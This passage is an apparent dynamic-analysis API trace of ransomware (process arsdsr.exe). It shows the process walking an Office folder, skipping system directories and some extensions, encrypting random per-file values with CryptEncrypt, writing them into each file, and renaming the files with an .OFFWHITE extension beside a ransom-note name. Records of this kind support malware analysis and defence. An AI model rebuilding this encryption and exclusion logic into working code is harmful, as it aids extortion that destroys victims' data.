ftLastWriteTime.dwHighDateTime=0x1cac7f6, nFileSizeHigh=0x0, nFileSizeLow=0x4360, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="STINTL.DLL.trx_dll", cAlternateFileName="STINTL~1.TRX")) returned 1 [0146.120] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2=".") returned 1 [0146.120] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="..") returned 1 [0146.120] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="...") returned 1 [0146.120] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="windows") returned -1 [0146.120] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0146.120] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="rsa") returned 1 [0146.120] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0146.120] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="programdata") returned 1 [0146.120] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="appdata") returned 1 [0146.120] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="program files") returned 1 [0146.120] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="program files (x86)") returned 1 [0146.120] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" [0146.120] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpString2="STINTL.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll" [0146.120] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.120] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.120] PathFindExtensionW (pszPath="STINTL.DLL.trx_dll") returned=".trx_dll" [0146.120] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0146.120] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0146.120] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0146.120] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0146.121] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0146.121] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0146.121] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0146.121] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0146.121] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0146.121] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0146.121] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0146.121] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0146.121] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0146.121] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0146.121] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0146.121] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.121] GetProcessHeap () returned 0x500000 [0146.121] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546ea8 [0146.121] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\stintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0146.121] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=17248) returned 1 [0146.121] GetProcessHeap () returned 0x500000 [0146.122] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0146.122] GetProcessHeap () returned 0x500000 [0146.122] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0146.122] GetProcessHeap () returned 0x500000 [0146.122] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0146.122] GetProcessHeap () returned 0x500000 [0146.122] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0146.122] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.122] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.122] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0146.122] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.122] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.122] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0146.122] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.122] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.122] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x100) returned 1 [0146.122] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.122] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.122] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0146.123] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x4360, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.123] SetLastError (dwErrCode=0x0) [0146.123] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0146.126] GetLastError () returned 0x0 [0146.126] GetLastError () returned 0x0 [0146.126] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x4460, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.126] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0146.126] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x4560, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.126] WriteFile (in: hFile=0x218, lpBuffer=0x546ea8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x546ea8*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0146.126] GetProcessHeap () returned 0x500000 [0146.126] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x4360) returned 0x5607c8 [0146.126] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.126] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x4360, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0x4360, lpOverlapped=0x0) returned 1 [0146.128] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.128] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x4360, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0x4360, lpOverlapped=0x0) returned 1 [0146.128] GetProcessHeap () returned 0x500000 [0146.128] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0146.128] CloseHandle (hObject=0x218) returned 1 [0146.128] GetProcessHeap () returned 0x500000 [0146.128] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0146.128] GetProcessHeap () returned 0x500000 [0146.128] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0146.128] GetProcessHeap () returned 0x500000 [0146.128] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0146.128] GetProcessHeap () returned 0x500000 [0146.128] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0146.128] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll" [0146.128] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll.OFFWHITE" [0146.128] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\stintl.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\stintl.dll.trx_dll.offwhite")) returned 1 [0146.129] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf706700, ftCreationTime.dwHighDateTime=0x1cac81a, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xbf706700, ftLastWriteTime.dwHighDateTime=0x1cac81a, nFileSizeHigh=0x0, nFileSizeLow=0x6960, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="VISBRRES.DLL.trx_dll", cAlternateFileName="VISBRR~1.TRX")) returned 1 [0146.129] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2=".") returned 1 [0146.129] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="..") returned 1 [0146.129] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="...") returned 1 [0146.129] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="windows") returned -1 [0146.129] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0146.129] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="rsa") returned 1 [0146.129] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0146.129] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="programdata") returned 1 [0146.129] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="appdata") returned 1 [0146.129] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="program files") returned 1 [0146.129] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="program files (x86)") returned 1 [0146.129] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" [0146.129] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpString2="VISBRRES.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll" [0146.129] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.129] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.129] PathFindExtensionW (pszPath="VISBRRES.DLL.trx_dll") returned=".trx_dll" [0146.130] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0146.130] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0146.130] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0146.130] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0146.130] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0146.130] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0146.130] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0146.130] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0146.130] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0146.130] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0146.130] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0146.130] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0146.130] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0146.130] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0146.130] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0146.130] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.130] GetProcessHeap () returned 0x500000 [0146.130] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546eb8 [0146.130] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\visbrres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0146.130] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=26976) returned 1 [0146.130] GetProcessHeap () returned 0x500000 [0146.130] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0146.131] GetProcessHeap () returned 0x500000 [0146.131] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0146.131] GetProcessHeap () returned 0x500000 [0146.131] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0146.131] GetProcessHeap () returned 0x500000 [0146.131] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0146.131] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.131] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.131] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0146.131] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.131] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.131] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0146.131] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.131] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.131] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x100) returned 1 [0146.131] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.131] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.131] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0146.132] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x6960, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.132] SetLastError (dwErrCode=0x0) [0146.132] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0146.134] GetLastError () returned 0x0 [0146.134] GetLastError () returned 0x0 [0146.134] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x6a60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.134] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0146.134] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x6b60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.134] WriteFile (in: hFile=0x218, lpBuffer=0x546eb8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x546eb8*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0146.134] GetProcessHeap () returned 0x500000 [0146.134] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x6960) returned 0x5607c8 [0146.134] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.134] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x6960, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0x6960, lpOverlapped=0x0) returned 1 [0146.138] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.138] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x6960, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0x6960, lpOverlapped=0x0) returned 1 [0146.138] GetProcessHeap () returned 0x500000 [0146.138] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0146.138] CloseHandle (hObject=0x218) returned 1 [0146.138] GetProcessHeap () returned 0x500000 [0146.138] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0146.138] GetProcessHeap () returned 0x500000 [0146.138] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0146.138] GetProcessHeap () returned 0x500000 [0146.138] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0146.138] GetProcessHeap () returned 0x500000 [0146.138] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0146.138] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll" [0146.138] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll.OFFWHITE" [0146.138] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\visbrres.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\visbrres.dll.trx_dll.offwhite")) returned 1 [0146.139] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70273800, ftCreationTime.dwHighDateTime=0x1cac814, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x70273800, ftLastWriteTime.dwHighDateTime=0x1cac814, nFileSizeHigh=0x0, nFileSizeLow=0x73960, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="VISINTL.DLL.trx_dll", cAlternateFileName="VISINT~1.TRX")) returned 1 [0146.139] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2=".") returned 1 [0146.139] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="..") returned 1 [0146.139] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="...") returned 1 [0146.139] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="windows") returned -1 [0146.139] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0146.139] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="rsa") returned 1 [0146.140] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0146.140] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="programdata") returned 1 [0146.140] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="appdata") returned 1 [0146.140] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="program files") returned 1 [0146.140] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="program files (x86)") returned 1 [0146.140] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" [0146.140] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpString2="VISINTL.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll" [0146.140] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.140] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.140] PathFindExtensionW (pszPath="VISINTL.DLL.trx_dll") returned=".trx_dll" [0146.140] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0146.140] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0146.140] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0146.140] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0146.140] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0146.140] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0146.140] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0146.140] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0146.140] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0146.140] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0146.140] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0146.140] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0146.140] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0146.140] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0146.140] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0146.140] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.140] GetProcessHeap () returned 0x500000 [0146.140] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546ec8 [0146.140] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\visintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0146.141] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=473440) returned 1 [0146.141] GetProcessHeap () returned 0x500000 [0146.141] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0146.141] GetProcessHeap () returned 0x500000 [0146.141] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0146.141] GetProcessHeap () returned 0x500000 [0146.141] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0146.141] GetProcessHeap () returned 0x500000 [0146.141] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0146.141] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.141] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.141] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0146.141] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.141] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.141] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0146.141] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.141] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.141] 